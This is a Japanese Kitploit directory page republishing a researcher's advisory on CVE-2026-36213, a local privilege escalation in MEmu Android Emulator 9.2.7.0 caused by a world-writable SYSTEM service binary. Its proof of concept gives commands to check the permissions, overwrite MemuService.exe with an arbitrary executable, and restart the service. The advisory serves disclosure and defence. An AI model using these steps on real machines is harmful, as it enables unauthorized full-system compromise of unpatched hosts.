Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-36213 — CVE-2026-36213 | MEmu Android Emulator 9.2.7.0 における安全でないサービスバイナリのアクセス許可を介したローカル特権昇格 | 9.3.2で修正済み | Kitploit
ツール/GitHubGitHub/sec-zone/cve-2026-36213
特権昇格脆弱性分析エクスプロイトペネトレーションテスト学習と教育バイナリエクスプロイト
GitHubsec-zone/cve-2026-36213

CVE-2026-36213

CVE-2026-36213 | MEmu Android Emulator 9.2.7.0 における安全でないサービスバイナリのアクセス許可を介したローカル特権昇格 | 9.3.2で修正済み

リポジトリを見る
512ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-36213

CVE-2026-36213 | MEmu Android Emulator 9.2.7.0における不安定なサービスバイナリ権限を介したローカル特権昇格 | 9.3.2で修正済み

CVE-2026-36213 — MEmu Android Emulator 9.2.7.0 LPE

CVE CVSS Status Platform

概要

MEmu Android Emulator 9.2.7.0におけるローカル特権昇格(LPE)の脆弱性。
サービス MEmuSVC は NT AUTHORITY\SYSTEM として実行されますが、そのバイナリは任意のローカルユーザーが書き込み可能であり、完全なシステム侵害が可能です。

フィールド詳細
CVECVE-2026-36213
製品MEmu Android Emulator (MicroVirt)
影響を受けるバージョン9.2.7.0以前
修正バージョン9.3.2
CWECWE-732 / CWE-269
CVSS v3.17.8 HIGH AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
ATT&CKT1574.010

脆弱性

MEmuService.exe は、不安定なNTFSパーミッションを持つSYSTEMレベルのWindowsサービスとしてインストールされています。

root@kitploit:~
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"

BUILTIN\Users:(F)   ← 任意のローカルユーザーがフルコントロール
Everyone:(F)        ← 全ユーザー書き込み可能

概念実証

:: ステップ1 - 脆弱な権限を確認

root@kitploit:~
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"

:: ステップ2 - バイナリを置き換える(低権限ユーザーとして)

root@kitploit:~
copy malicious.exe "C:\Program Files\Microvirt\MEmu\MemuService.exe" /Y

:: ステップ3 - サービスを再起動

root@kitploit:~
sc stop MEmuSVC && sc start MEmuSVC

:: 結果: malicious.exe が NT AUTHORITY\SYSTEM として実行される

検出スクリプト

入手先: https://github.com/sec-zone/Hijack-service-binaries

免責事項

この研究は、責任ある開示ポリシーの下で教育目的で実施されました。
著者は、この情報の誤用に対して一切の責任を負いません。

研究者

名前: Mohammad Hossein Ashofte Yazdi
LinkedIn: https://www.linkedin.com/in/seczone64
Twitter: @sec_zone64
メール: [email protected]

ツールをダウンロード